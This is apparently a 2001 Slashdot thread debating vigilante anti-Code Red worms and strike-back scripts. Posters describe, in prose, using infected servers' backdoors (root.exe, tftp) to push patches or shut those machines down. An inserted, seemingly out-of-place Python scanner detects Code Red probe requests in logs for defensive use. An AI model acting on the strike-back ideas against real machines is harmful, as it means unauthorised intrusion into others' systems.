    That's a great idea! The only way to get incompetent sysadmins to fix this would be to do it for them, right? Since they obviously aren't doing it themselves. I doubt it would even be that difficult to write! Perhaps you could write other viruses which patch vulnerable machines as well!

    --
    "Question with boldness even the existence of a god." - Thomas Jefferson
  305. HP Printers: Who can fix THEM? by skyknytnowhere · · Score: 1

    I'd pay good money for a script that would somehow protect HP printers from infection, or at least create a temporary firewall of addresses infecting them.

    This is the quiet side of the issue, because the printers can't infect other sites. But a printer also can't be power cycled remotely (except if you've somehow foreseen this problem). The printers are also unlikely to be patched, so their security holes will exist long after this current worm is done sucking bandwidth. And I really hate walking across the lab, up 3 flights of stairs, to restart the printer.

    skye

  306. Re:Because of this the internet is dying.. by Anonymous Coward · · Score: 0

    Yup, the Internet, *BSD, fair use, freedom, and even Slashdot. Why go on living?

  307. The AntiVirus I wrote... by gamorck · · Score: 0

    Yeah I wrote something - it's a set of scripts that work with IIS. I have a web app that will parse through IIS logs and dump a report back to you with a nice little graph.

    I've developed a script - though it's not fully functioning yet outside my test environment - that will detect a code red attack and immediately strike back by using root.exe to upload several files using tftp.

    These files are used in an attempt to automatically patch the server and remove the security holes left by code red.

    Unfortunately it has yet to actually succeed over the web. Most of the attackers seem to experience problems when it comes to shutting down. My defense routines automatically try two different ways of shutting down the remote machines (both of which work in my internal network between different machines) - but I can't quite get them to work on the machines on the web.

    It may be because of the increased security of NTFS. As my routines are only designed to work with security-lax FAT formatted systems - that may be part of it.

    Anyway - Code Red is only getting worse. I've had over 2100 attack attempts since Saturday. Day by day the daily number is increasing (600 today alone). This has got to stop.... and I do not believe it will until somebody writes a worm like code red that patches the servers instead of opening them up.

    Note: I posted this one YESTERDAY in the CODE REDUX and you damn moderators wouldn't even give me one damn point. Idiots. I wonder if my karma can slip below -5?

    --
    I love idealists not because I am one, but because they make life bearable for pragmatists such as myself.
  308. What we really should do instead by d00fus · · Score: 1

    We really just need to publicize that it's Microsoft that got us into this mess. Microsoft can and should be cast in a negative light for their slipshod dedication to security. I mean, they knew about the hole; they have had lots of major security holes in IIS. They do not have the appropriate attitude about security. They want to maximize profit by not spending developer resource on fixing things and pubs resource on getting the fixes out. In that sense, they are trading the profits and losses of companies using their product, for their own financial gain. (Monopoly behavior?)

    So I say let IT keep fighting the worm and let's help them cry louder and longer about Microsoft to the media and their business executives. With any luck IIS will be tried, convicted and sentenced to death in the court of public opinion and we'll have one less security nightmare.

    1. Re:What we really should do instead by Miss+Congeniality · · Score: 1

      I'm no fan of Microsoft, but
      M$ did not drop the ball this time.
      This was a known vulnerability with
      an existing patch that was included in
      Windows update.

      Blame neglectful and inexperienced SysAdmins and
      the fools who were hoodwinked into hiring them.
      Blame the poorly managed companies that
      undervalue experienced IT workers and sack half
      that dept come lay-off time.

      When an admin is not vigilant about patches and
      auditing no OS is secure.

  309. The Root of the problem by szomb · · Score: 1

    The root of the problem is not the OS (or lack of it ... hehe). The problem is clueless admins. I am at a loss as to just how FUCKING CLUELESS one has to be...forget security mailing lists, forget vendor announcements...this virus has been in the mainstream media for weeks. Anybody who is still vulnerable to this bug should IMNSHO be "Disbarred" from systems administration forever.

    --
    Just because a few of us can read write and do a little math, doesn't mean we deserve to conquer the universe
  310. Can I be the large man? by Anonymous Coward · · Score: 0

    at a cost of $300 per house.

  311. Not necessary, if people would only research by ColGraff · · Score: 3, Insightful

    There are a lot of good legal resources out there, both internet law libraries, the supreme court web site, and actual "meatspace" libraries. If people would just do a little research before posting, we would have a lot fewer "it seems to me that" posts and a lot more informative "if we apply the ruling in blank V blank" posts. I can dream, can't I?

    --
    I'm the stranger...posting to /.
    1. Re:Not necessary, if people would only research by dhd · · Score: 1

      Heh, and by the time you know what you are talking about, the discussion is closed.

    2. Re:Not necessary, if people would only research by chryptic · · Score: 1

      I agree. The only real difference between the layman and the lawyer is a little bit of study on a subject. IANAL is really a very meaningless statement; if people do some research they can be on the same level as the lawyer. On one narrow subject that is.

      --
      The two most common things in the Universe are hydrogen and stupidity. -- Harlan Ellison
  312. This is OLD.... by Lxy · · Score: 2

    I've seen this asked many places already. The long and the short of it is that this tactic is ILLEGAL. You'd be subject to the same punishment as the Code Red authors. Yes, your intentions are good, but you're A) accessing a computer system without consent and B) INSTALLING software without consent. This is no different than me walking into your house at 3 AM to install the IIS patch on your server. It doesn't matter that I had good intentions, I'd be at gun point pretty quick. I'd be charged with unauthorized entry regardless... you didn't invite me, I came in, and refused to leave when you told me to because "the patch wasn't finished upgrading".

    --

    There is no reasonable defense against an idiot with an agenda
    :wq
  313. Do most infected IIS sites also host email? by bear_phillips · · Score: 1

    I know many linux guys have some type of email server running at home. How about on IIS? Would it do any good to send emails to postmaster@xxx.xxx.xxx.cablemodem.com or root@xxx.xxx.xx.cablemodem.com ?

    --
    http://www.windmeadow.com/
    1. Re:Do most infected IIS sites also host email? by J'raxis · · Score: 1
      ...What are the chances that these people check that mailbox?

      (BTW: Does Windows NT install and activate IIS by default? About 90% of the scans I got from *.mediaone.net hosts all had "under construction" pages up as if they didn't even know it was there. That would explain a lot.)

  314. Good Samaritan laws? by TheFlu · · Score: 2
    I know several states have laws that afford some level of immunity to people who have the intention of helping others (more info here). These laws usually deal with physical actions, such as performing CPR on someone, trying to save someone from a fire, etc...

    In a sense, "white hats" are merely Good Samaritans themselves. Perhaps new laws should be passed to cover the actions of Good Samaritans whose intent is to help others online.

  315. Addendum by Scoria · · Score: 1

    I believe that the United States FBI

    I know there are 'computer intrusion laws' in the United States. However, this kind of thing is in an ever so slightly grey area, and the FBI (I believe) has stated before it is still an unauthorized intrusion.

    Wish I had a link to give you guys. Oh well.

    --
    Do you like German cars?
  316. This has already been addressed. by Anonymous Coward · · Score: 0

    We seem to be forgetting the fact that a similar "inoculant" was released once to repair a similar problem. The guy that released it was jailed, not because he released a "repair" type virus, but because the repair worm left a back door for him on the people's server....If the worm in question had NOT installed a back door, but had simply installed a fix and then looked for more code red servers before erasing itself, would that be legal? Interesting question.

  317. Re:Its entirely possible by jgerman · · Score: 5, Informative
    It's not necessarily true that an American citizen can respond with deadly force to criminal trespass. That varies state by state. Here, in MD, for example, if someone breaks into your home and threatens you, you must make every effort to vacate the home. You can not just shoot him for trespassing, breaking and entering, or anything else.

    Guess that means if my machine gets hacked here I have to give it over to whomever hacked it.

    --
    I'm the big fish in the big pond bitch.
  318. What if you screw up? by r_j_prahad · · Score: 2
    What if your beneficial virus has a coding flaw that you didn't catch when you were testing it? And it streams across the net and takes down thousands of websites unintentionally?

    I can tell you what'll happen; your wardrobe the next day will be an orange jumpsuit and shower shoes.

  319. Re:Its entirely possible by Anonymous Coward · · Score: 0

    Lawyers are licensed by a state after passing the Bar. However, some states' Bars are accepted by others'. Basically you'd need a Lawyer from CA or NY. So no, you would not need even 50.

    Furthermore, software liability cases are almost always handled at the state level, never below. Counties generally regulate stuff like building codes, water rights. Cities handle crap like parking meter regulations (REALLY interesting crap). It would be interesting to see San Francisco or (more likely) Alameda County put a ban on Windoze or IIS...

  320. NO such word as virii by Anonymous Coward · · Score: 0

    http://www.dictionary.com/cgi-bin/dict.pl?term=Virus READ: The plural of Virus is VIRUSES NOT VIRII. REPEAT READ: The plural of Virus is VIRUSES NOT VIRII. PASS ALONG: The plural of Virus is VIRUSES NOT VIRII.

  321. I Said this Yesterday by nicoz · · Score: 0, Offtopic

    I mentioned this yesterday and some ASS HOLE Called me "REDUNDANT REDUNDANT REDUNDANT". Said I should lose Karma. Use whatever it takes!

  322. You'd spawn a war that hasnt escalated so far by SirSlud · · Score: 4, Insightful

    Actually, there's nothing like a challenge to a virus writer .. so I'll bet if you started spreading a good one, you'd just start escalating the war. Sometimes I believe viruses haven't caused major catastrophes yet because we don't fight viruses with viruses. Think of guns .. since we fight guns with guns, it really ends up coming down to who has the most/biggest guns. Do we really want to find out who has the most time and haxoring genius, the black hats or the white hats?

    --
    "Old man yells at systemd"
  323. Re:IIS = Loaded Gun? by Anonymous Coward · · Score: 0

    Of course, you're ignoring the fact that sometimes people need to be killed. For example, if someone enters my home at night without my permission, according to the law I can use deadly force to stop them. And I will. Say hello to Mr. 9mm!

  324. words of warning... by gnurd · · Score: 1
    He who fights with monsters might take care lest he thereby become a monster. -- Nietzsche

    'nuff said.

    --
    "i was saying gnu-rd"
  325. That's the worst idea I've ever heard by ChrisDolan · · Score: 1

    Anyone who uses a script like that is crazy. Next there will be a Code Red III which spoofs the originating IP and then your perl script becomes an unwitting part of a distributed DOS attack... Then YOU go to jail instead of the Code Red author.

  326. New acronym... by ralmeida · · Score: 1
    IASOL

    (I am Slashdot's official lawyer)

    --
    This space left intentionally blank.
  327. IT Darwinism by zothorn · · Score: 1

    Just fire whoever is neglecting their servers.
    But a lot of it boils down to the typical mentality of the admins.

    Typical NT admin: "If they're not a member of the admin group.. Then we're safe."
    Typical Unix admin: "We're never safe, but we try our hardest every day."

    1. Re:IT Darwinism by zothorn · · Score: 1

      Exactly. I started to take MCSE classes and then quit when I found out that my instructor knew less than I did. (He was a Microsoft employee!) and he worked in the MS IIS and Frontpage support group. Later I got a job doing NT support at a large Pharmaceutical company and they said that the fact that I was not an MCSE was a plus. Because all my claims on my resume meant I had hands on business experience. My website for example I wanted to be as low maintenance as possible, so I chose OpenBSD and Apache running on Sparc. So even if someone managed to upload a precompiled program and tried to run it, it wouldn't because they probably used an i386 version. It irritates me to see my logs fill up with get default.ida NNNNNNNNNNN but I know that I could leave this server for 3 months and come back with nothing out of the ordinary.

    2. Re:IT Darwinism by Miss+Congeniality · · Score: 1

      >the fact that I was not an MCSE was a plus

      My friend is a Win Admin and he has had the opposite experience.

      MCSE == "Get Rich Quick" where I am (NYC area) and the job market is glutted with inexperienced people eager for a piece of the action. Add this to the .com decline around here and it's driven the avg. salary down to almost nothing.

      He's got 5+ years of professional experience under his belt and gets asked questions like:

      "Do you have at least 10 years experience with Windows 2000?" (I swear this is not made up!)

      When he said no and explained why this is impossible they hung up on him. They wanted him to have a CCNA, MCSE, be on call 24 hrs and pay him $30,000 for this!

      He was thinking of just caving and getting his MCSE, but he's got several years of professional experience and a Master's Degree. In my opinion it could only tarnish his resume.

      From my personal perspective I am sick to death of dealing professionally with people who know the lingo but do not have the skills. (i.e. "Solution Providers", "Infrastructure Architects", etc.) I make it a point to tell anyone who throws so much empty jargon at me to "bite me".

  328. I say spread em by Atrophis · · Score: 1

    who really cares? i mean, if people keep producing virii/worms and others make ones that fight them then this is bound to be a big mess.

    and if it takes a big mess for people to a) get a clue and b) fix their fscking security problems, then maybe this wouldn't be such a big problem ever.

    sometimes the best way to take care of a fire is to let it burn itself out.

    --

    i cant seem to come up with a sig.
  329. Well, then, Mr. Chaos-Darwin... by Anonymous Coward · · Score: 0

    Well, if it gets so damn annoying - THEN INSTALL THE FUCKING PATCH! No more viri, no more anti-gen. Or hell, just unplug your blooming network card. (Then you'll just have to monitor the airwaves for rogue Bluetooth or WIP messages...)

  330. Re:Its entirely possible by cheshire_cqx · · Score: 1

    Well, that's not exactly right either. Remember, you're talking about laws dealing with *physical* force, not retaliatory/defensive computer intrusions.

    Your scenario would be: Adam breaks into my server, so I go over and shoot Adam, or break his mousing arm with a baseball bat.

    Compare: Adam breaks into my server and steals confidential data. I trace the attack back to Adam, infiltrate his workstation, and perform a destructive format of all of his hard drives.

    IMHO, this latter form of "self help" is more of a grey area, legally. However, it may have negative practical consequences. (Piss off a black-hat subculture and risk annoying attacks from all quarters -- c.f. middle-east style escalation.)

    IMO, an anti-worm worm is possibly illegal, and could lead to lots of civil liability if a bug is present in the code that trashes a server somewhere and they find out you released the anti-worm.

  331. Re:Its entirely possible by VivianC · · Score: 4, Insightful

    IANAL but....

    There is really no single law that covers this so a lawyer would be useless in this case. You could get ten different opinions from five different lawyers and any or all of them could be right. Or wrong. That's what Judges do.

    Now, with the PHP or CGI programs that do something to a computer, it would be a very grey area. After all, the 'attacking' computer is actually requesting information from your machine. You are simply returning information. Then you can get into the motive of the requestor and the motive of the author and it gets even worse.

    Basically, all a lawyer is going to tell you is his theory of how a set of laws will be interpreted. Only Judges can actually do the interpreting.

    --
    Viv

    Gmail invites for ip
  332. Same Sides Issue by virg_mattes · · Score: 2

    > Colorado (for positive) and many other states have a "make my day" law.

    This doesn't contradict my original statement. Note that my example describes a breakin when the homeowner isn't home (the MMD law doesn't apply) and that when he/she is, that the burden of proof for threat rests with the homeowner (MMD laws relax that burden considerably, but they do not remove it).

    Virg

  333. net police by SKicker · · Score: 5, Insightful

    If these worms are illegal because they gain unauthorised entry then of course making a 'friendly' virus is illegal because it is doing the same thing.

    Having good intentions is nice but consider this (fictional) scenario: A local cat keeps trying to have 'relations' with my cat and I don't know who the owner is, plus the owner is unaware of their cat's activity. I catch the cat and get it 'fixed' without the owner knowing. When the owner finds out I doubt they or the police would be too pleased about it. Swap 'cat' for 'web server' and you have this code red situation.

    Yes the internet is unpoliced but I don't think the 'Do-Gooder' virus is a very good answer. Internet policing is an interesting new subject but traditional security ideas still apply - the owner of the house is the one responsible for making sure the door is locked. People need to be taught this applies to the internet too.

    (And no jokes about unauthorised entries thank you very much)

    1. Re:net police by WNight · · Score: 2

      Your analogy didn't convince me that anti-worms are bad, rather it convinced me that people who can't take care of themselves or pets should be taken care of in the most expedient fashion.

      I will consider vigilante-spaying the next time one of my neighbors has a cat which is in heat and past its first heat (which you're not supposed to spay a cat before). It'd be well worth the $40 to get a night of sleep, and I am a firm supporter of spaying/neutering all your pets anyways. Always pisses me off when people don't and contribute to the problem of unwanted animals.

  334. White hat = original Code Red by drc500free · · Score: 1

    What makes this different from the FIRST code red worm? You want to create something that is just as infectious. However much bandwidth Code Red 1 chewed, this would chew just as much. Granted, code red didn't take up all that much, but we have to think of ALL of the consequences of releasing a worm just because WE think it is a good idea.

  335. "Not getting sued" by catfood · · Score: 1
    This is wonderful advice, so long as your morality system can be summed up as "don't get sued".

    Why yes, part of my morality system is "don't get sued." It comes from the part that says "don't bounce your checks" and "don't get your house foreclosed on."

    Ask your lawyer the same question about an injured person lying in the street. If you do nothing, they can't sue you right? but if you try to help them, you might actually injure them and they'll sue you. Does this mean the RIGHT action is to do nothing? No. It means the legal system is fucked.

    Actually, I really and truly did ask my lawyer something similar to that, in a systems support sense.

    His reply amounted to this, which is blah blah not legal advice don't listen to me disclaimer yadda yadda. There are circumstances where you have a duty to say or do something. Those cases are usually pretty obvious, such as when your client, to whom you have a duty because you're their rented admin, is about to lose important data. Or when you find a stranger lying in the street. Or when you find a lost child and nobody else is around to help. Etc., etc.

    In those cases you may be liable if you don't react in a responsible way.

    Observing a Code Red infestation isn't one of those cases. If you just put up your shields you've done enough. If you choose to send a short, polite email to affected sites, that is probably a good thing. A phone call might be even better.

    But that's another angle, similar to how self-defense is applied. If you can defend your network adequately by proper configuration and perhaps notifying or firewalling away the attacking sites, then your claim to "self-defense" (which is really not called self-defense in a legal context, more like "abatement of a nuisance" or "mitigating losses") becomes much, much weaker.

    Yet again, I'm not a lawyer, this is not legal advice, don't listen to me if this is important to you, this is all just for discussion. But long story short, the stranger lying injured in the street creates a duty on your part in many circumstances. Stranger with Code Red infestation probably does not create a duty, only a liability risk if you take it upon yourself to "fix" it.

  336. Two different things... by Anonymous Coward · · Score: 0

    I think people are proposing and talking about two different solutions here:

    1. Have another anti-Code Red worm, where code is uploaded to an infected machine, and then the previously infected machine then runs the anti-Code Red worm too, and then actively scans for more infected hosts to pass the 'cure' on to. IMHO, this is probably a bad idea.

    2. Make a script on a webserver named default.ida that sends the appropriate commands to the backdoor on CR2 infected machines to download and install the patch. The script merely waits for connections to the webserver it's on, and doesn't propagate itself to other machines. IANAL, but to me, this would seem to be on better (but not necessarily solid) legal ground, as you were merely responding to a request the infected machine sent you, instead of actively searching for infected machines, and uploading yet another worm to them.

  337. Another option by Derkec · · Score: 1

    What if instead of releasing a virus, you made a program which waited for probes from infected machines and responded to those probes by exploiting the hole to close the hole?

  338. It's not breaking and entering... by dankjones · · Score: 1
    A:Yes, it would be illegal.
    B:Don't get caught.
    C:It's not breaking and entering if the door is standing wide open.

  339. Re:Its entirely possible by Hittman · · Score: 1

    You'll find plenty of cases where a criminal harmed by a victim who was protecting himself has successfully sued for damages.

    Which is an excellent justification for killing him, rather than just hurting him.

  340. Bruce Schneier Has Already Talked Of This... by zonker · · Score: 0

    In this article he wrote for ZDnet, Bruce Schneier (of counterpane.com and author of applied cryptography and countless security whitepapers) has talked about this in good detail here: ZDNet Article.

  341. Re:Its entirely possible by Anonymous Coward · · Score: 1, Insightful
    /* If someone is breaking into your house to use your coffee maker, are you allowed to kick down their door and throw away all their coffee? */

    If the bastard is in *your* house, it really doesn't matter *why* he's there. You don't know for sure why he's there, all you know is he broke in your house. That's why if someone breaks into your house and you blast him, it's generally held as self-defence.

    Yeah, but you missed the point. Sure it's probably kosher to defend yourself against a stranger who's broken into your house by attacking him. What would not be kosher is to go to his house, break in, and throw away his coffee.

  342. That's a illegal law. by DaLinuxFreak · · Score: 0

    States are not allowed to make laws that contradict the constitution. Not even the US supreme court is allowed to. Under the constitution, you as a US citizen are allowed to bear arms, meaning getting a concealed weapons permit is also null and void. If someone breaks into your house you can shoot them and have the US constitution back you up, but it still won't help you until a really high appeal ;-)

    There's so many people who don't care about their constitutional rights getting blatantly stolen from them.

  343. Re:IIS = Loaded Gun? by Anonymous Coward · · Score: 1, Insightful
    It's fun!

    Fun with guns is unnecessary. Guns kill people and should be banned no matter how "fun" they are.

  344. How about using an 'agent' type framework? by qwaszx · · Score: 1

    Instead of having this counter-virus/worm attack the computer, have each computer (possibly as part of an anti-virus package, or windows itself (or installed with every linux distro)) contain a framework which allowed limited access to a computer by counter-viruses/worms voluntarily, and with safeguards to prevent abuse and overuse of bandwidth/resources etc..

    Of course, there would be problems getting everyone to install the agent host, but if such an idea became accepted, then each counter-virus would run in a sandbox and be prevented from doing harm (set by the user).

  345. Re:Its entirely possible by GreyyGuy · · Score: 1

    Instead of releasing such a virus, what about just running it on your own machine(s)? Every time your machine gets probed and attempts to infect, it just turns around and does the same thing to the originating machine. That way you are not doing anything that wasn't done to you, and you are patching a known infected machine, not clean ones.

    I wouldn't think they would have a good case for you intruding/hacking since they did it to you first. Just keep the logs of the event to CYA.

  346. Re:As I get seriously annoyed - think again by jeffc128ca · · Score: 1

    Think again. It would be nice if that's the way the world worked but it doesn't. Legally you can't tamper with a network or system without the owner's permission. No matter how benevolent the creator the company's lawyers will go after you no matter how honest your intentions are. You messed with our systems and it's off to court you go. There have been a few court cases regarding this already. The one I remember was in Nevada (I think) where an IT person fixed something on a client's computer that was out of scope to his work there. The client company sued and won.

    There are also lots of "cease and desist letter" stories from anyone trying to be helpful and informing companies of holes in their networks.

  347. They already thought of that and decided not to by polyphemus · · Score: 1

    http://www.pbs.org/cringely/pulpit/pulpit20010730.html Bob Cringely has already discussed this, and said that the government decided not to do this, because it made them seem too much like the bad guys. However, an enterprising, altruistic computer programmer might be able to do what the feds were afraid to do. And even if a mistake is made and a second "red alert" worm is created, big deal! 2 won't do any more damage than just the 1.

  348. ISP Scans by rlp · · Score: 1

    My cable modem is currently blinking furiously as infected "Code Red" hosts scan it. Being constantly scanned by hosts infected with a "good" worm would definitely not be an improvement. What I'd like to see is ISPs scanning their customers' machines for known vulnerabilities and then sending the customer an E-mail with fix (patch) info. A periodic scan from an ISP would be useful, a DoS attack from a "good" worm is not.

    --
    [Insert pithy quote here]
  349. plural of virus by suprslackr420 · · Score: 1

    I can feel the flames licking my toes as I write this. Virus is a Latin word, the plural of which is viruses. I know virii seems to be the word of choice among most geeks, but I had to get this off my chest. The biological word uses the correct terminology, why can't we?

    --
    ubi dubium ibi libertas.
    1. Re:plural of virus by J'raxis · · Score: 2

      Depending on what declension it is (I haven't dealt with Latin in a long time), wouldn't the plural either be virî (one I) or virûs in Latin? I seem to remember that there are a few strange (fifth declension?) -us words that are pluralized with -ûs.

  350. Re:Its entirely possible by Anonymous Coward · · Score: 0

    Um..no. The critical point here is that the gun is brandished. You have a right to disarm or attack someone actively pointing a gun at you, not one who merely owns a gun that could be potentially pointed at you. This applies to the code red situation if a 'self-defense' patch is applied to a computer that scans yours for the vulnerability as opposed to searching for any computer running the virus and applying the patch to it.

  351. Fireman of the Internet? by Anonymous Coward · · Score: 0

    Instead of having vigilantes take the initiative to fight back against Internet Worms, it might be handy to have an international agency whose charge is to take care of these things. For an analogy, consider a fireman. They don't ask politely about breaking down the door and dousing a place in water. If it's on fire and presents a clear and present danger to its neighbors, then they take care of it. Same with an infected computer on the Internet.

  352. Great business plan. by supabeast! · · Score: 2

    Supply programs that do this for all the latest viruses to the IT departments of companies with bad/lazy/not enough sysadmins. Charge them a yearly fee, and just email them a new worm that will go through their network and close all the holes behind itself once a week. Have a client that they can put on their firewall to keep it from escaping to external networks (Or just program it to stay on local networks.).

    There are companies out there that might actually pay for this.

  353. a way back when this was first talked about by jeffc128ca · · Score: 1

    I remember around 1988 to 90 when I first researched computer viruses they talked about benevolent uses of viruses. Some software companies were looking into using viruses to patch programs and pass on software upgrades without the user having to do anything. It didn't get any further than that if I remember.

  354. What I want to know... by Anonymous Coward · · Score: 0

    ...is when is someone going to write a virus called "Windows is insecure", so that the media can't try to sluff it off as a general security problem of the Internet :-)

  355. Simpler, non-illegal technique to stop code red by btempleton · · Score: 2

    Create a scriptalias on your web server, so that fetches of "default.ida" go to a CGI which responds, very slowly -- just under code red's timeout -- with whatever code red is looking for as the response of a successful penetration.

    I know it creates a lot of threads, but assuming it will tolerate a decent timeout, enough of these would slow it down quite a bit, until it dies from people installing fixes.

    Anybody taken apart the virus to know what timeout to use and what response it's looking for?

    --
    Has it been over a year since you last donated to the Electronic Frontier Foundation
  356. As I get seriously annoyed by seann · · Score: 0

    with reading all your "This is illegal" nonsense.
    First, if you did write a beneficial cure to this virus, many would thank you in return.
    Secondly, where is the creator of the original virus? And how can I thank him in return? Does anyone have his E-Mail Address? No? Point taken.
    In conclusion: Nobody knows who first spread this virus, so if you spread a purely good virus that patched IIS, restarted the service, and made sure it was not break-in-able to any known issues, the public would worship this super hero, and as long as the super hero did not take off his mask to unveil his true face (being offered money from companies, gloating rights) he would be safe.

    --
    I'm a big retard who forgot to log out of Slashdot on Mike's computer! LOOK AT ME.
  357. Breaking into a house to install a better deadbolt by Akatosh · · Score: 1

    It's illegal. A lot of the 'damage' done by code red is not direct anyhow. A friendly worm would cause just as many headaches. It would still crash cisco 600 routers, break web proxies, clutter up logs and waste bandwidth. It's fighting fire with fire, the friendly worm would be just as much of a problem as the unfriendly one. The last guy that did it got arrested.

    You also have to consider the implications of rebooting a computer with an unknown function.

  358. Why not fix the problem @ the source? by cnmill · · Score: 1

    Just write a white hat worm that goes in through the trapdoor and overwrites the OS with your favorite version of linux.

    No more virus problem, right, zealots?

    --
    How sleepless is the egg, knowing that which throws the stone foresees the bone.
  359. What if my 'default.ida' was a program? by mgkimsal2 · · Score: 2, Insightful

    The worm goes after 'default.ida' as I can see. They're trying to execute a program on my system. (default.ida). If my default.ida was actually a script that sent a payload back, and that payload just HAPPENED to be commands to disable their system, what's the harm there? I'm not ACTIVELY exploiting their system. I'm only sending a payload back in response to a request that THEIR system requested. Seems pretty clear cut to me.

    Code red backdoor checker
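    Several posts above (the default.ida-as-a-script idea, and the suggestions to notify or firewall the hosts that probe you) depend on first recognising the probe in your own logs. As an added example, not code from any poster or project in this thread, here is a small Python log scanner that does that and produces a notify/firewall list; the combined log format, the padding-character-to-variant mapping and the sample log lines are assumptions constructed for this example.

```python
"""
Added example: pick Code Red probes (a GET for /default.ida followed by a
long run of identical padding bytes) out of a web-server access log and
summarise which source hosts are infected, so the operator can e-mail or
firewall them. Log format and variant mapping are assumptions, see below.
"""
import re
from collections import Counter, defaultdict

# Assumption: Apache/IIS-style combined log line. Only the client address,
# the request line and the status code are needed; the rest is ignored.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)

# A probe requests default.ida with hundreds of identical padding bytes.
# The thread's own log sample shows 'N' padding; Code Red II used 'X'.
# Mapping the padding byte to a variant name is this example's assumption.
PROBE = re.compile(r'^GET /default\.ida\?(?P<pad>[NX])(?P=pad){20,}', re.I)
VARIANT = {"N": "Code Red (v1/v2)", "X": "Code Red II"}


def parse_probe(line):
    """Return (source_ip, variant) for a Code Red probe line, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    p = PROBE.match(m.group("req"))
    if not p:
        return None
    return m.group("ip"), VARIANT[p.group("pad").upper()]


def summarise(lines):
    """Aggregate probes per source host: probe count and variant(s) seen."""
    counts = Counter()
    variants = defaultdict(set)
    for line in lines:
        hit = parse_probe(line)
        if hit is None:
            continue            # ordinary traffic, not a probe
        ip, variant = hit
        counts[ip] += 1
        variants[ip].add(variant)
    return {ip: {"probes": n, "variants": sorted(variants[ip])}
            for ip, n in counts.items()}


def notify_list(summary, min_probes=1):
    """Source hosts worth contacting (or firewalling), most active first."""
    ranked = sorted(summary.items(), key=lambda kv: (-kv[1]["probes"], kv[0]))
    return [ip for ip, info in ranked if info["probes"] >= min_probes]


# Constructed sample log: two infected hosts (one per variant) plus normal
# traffic that must not be flagged. The probe tail is truncated on purpose.
SAMPLE_LOG = [
    '198.51.100.7 - - [04/Aug/2001:10:02:11 -0400] "GET /default.ida?'
    + 'N' * 224 + '%u9090 HTTP/1.0" 404 273',
    '198.51.100.7 - - [04/Aug/2001:10:02:13 -0400] "GET /default.ida?'
    + 'N' * 224 + '%u9090 HTTP/1.0" 404 273',
    '203.0.113.42 - - [04/Aug/2001:10:03:01 -0400] "GET /default.ida?'
    + 'X' * 224 + '%u9090 HTTP/1.0" 404 273',
    '192.0.2.9 - - [04/Aug/2001:10:03:05 -0400] "GET /index.html HTTP/1.1" 200 1043',
    '192.0.2.9 - - [04/Aug/2001:10:03:06 -0400] "GET /default.htm HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    report = summarise(SAMPLE_LOG)
    for ip in notify_list(report):
        info = report[ip]
        print(f"{ip}: {info['probes']} probe(s), {', '.join(info['variants'])}")
```

    Feed it real log lines (one per list element, or a file iterator) in place of SAMPLE_LOG; the two requests for default.htm and index.html show that only the padded default.ida request is counted.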

  360. Re:Its entirely possible by Anonymous Coward · · Score: 0
    My god! That's horrible. And decidedly unAmerican. Who the hell passed that law? Washington cries every night over stuff like that.

    *breathes deeply*

  361. again together by Anonymous Coward · · Score: 0

    So one intrusion is better than the other, I'd take the French over the British? (vice versa, ad nauseam, ad infinitum?)

  362. Re:Its entirely possible by ashitaka · · Score: 1

    We would need hundreds. 50 wouldn't even cover the U.S. given all the jurisdictions. (Federal, State, County)

    --
    If you don't want to repeat the past, stop living in it.
  363. Re:Its entirely possible by Anonymous Coward · · Score: 0

    This is why I live in Pennsylvania...

    Seriously: Check out the crime stats... It's interesting to correlate when gun legislature is passed with the migration patterns of our criminal elements..

  364. Verizon is going to block port 80? by Anonymous Coward · · Score: 0

    Does anybody else know of this? Bastards

  365. Don't do it by Anonymous Coward · · Score: 0

    The danger is the bandwidth. The damn virus eats our entire FW CPU because it's being inspected by Code Red from Japan, US and a couple of other countries at the same time. If you would do an antivirus with the same method you would cause the same amount of bandwidth, at least the first week or so. I told my IT chief about that and he did agree in the end but the idea is good though.

  366. IIS = Loaded Gun? by BigBlockMopar · · Score: 1

    Why stop there? Why not sue gun makers cause they make something that is only good for killing people? Oh wait, a bunch of idiots already tried to pull that shit and lost.

    Guns have a lot of benign uses. Ever shot clay pigeons? Ever shoot cans off a fencepost? It's fun!

    IIS, however, has no such benign uses.

    --
    Fire and Meat. Yummy.
    1. Re:IIS = Loaded Gun? by Anonymous Coward · · Score: 0

      IIS, however, has no such benign uses.

      could you have at LEAST hidden your infantile zealotry for at least the 10 seconds that it took you to write this crap. That is exactly the same as saying "Apache has no such benign uses."

      IIS has a lot of benign uses, just like Apache, just like iPlanet, just like Zeus. Apparently this fuckwit has never browsed around the internet looking for pr0n, or never went to a website on how to be a bigger retard than you already are, or better yet never went to a news site that is just for over zealous nerds and tells you bigotry that matters.

      I dislike Microsoft just as much as the next person, but you sir are a fucking moron and should be restricted to posting at -1 which not coincidentally matches your IQ. No, better yet why don't you climb to the top of the office building that you work in and lean way too far off the edge.

      God, I'm so pissed off now that I could fucking strangle a fucking poodle and throw it in traffic, except that if I am in California the damn liberals there would just throw me in jail. Now I'm pissed off and I don't have any creative outlet other than to take it out on some sorry ass linux zealot. I'd punch you in the face but I don't want your god damn zits to pop all over me thus coating me in a layer of thin goo.

    2. Re:IIS = Loaded Gun? by orangesquid · · Score: 1

      IIS has a lot of very important benign uses. It's what you put on your honeypot servers to disguise your real webservers so as to lure DoS attacks towards the IIS machines :)

      --
      --TheOrangeSquid Is it any wonder things seem so awry? We swim in a sea of confusion and don't have to think to survive
  367. Bandwidth Issues by Bozar · · Score: 1

    I don't understand what people are talking about with an increase in bandwidth usage by more worms. More worms does not have to mean more bandwidth used up! Here is a simple layout for an algorithm that would reduce the bandwidth taken up by either code red (sorry i don't know how to program the virus myself, otherwise i would)
    1. Make the retrovirus
    A counter-infected machine should first patch itself and fix the effects of the code red II virus. Then it should kill all code red infections found on the machine. Then the virus should scan other computers randomly for 24 hours, and then remove itself from the computer.
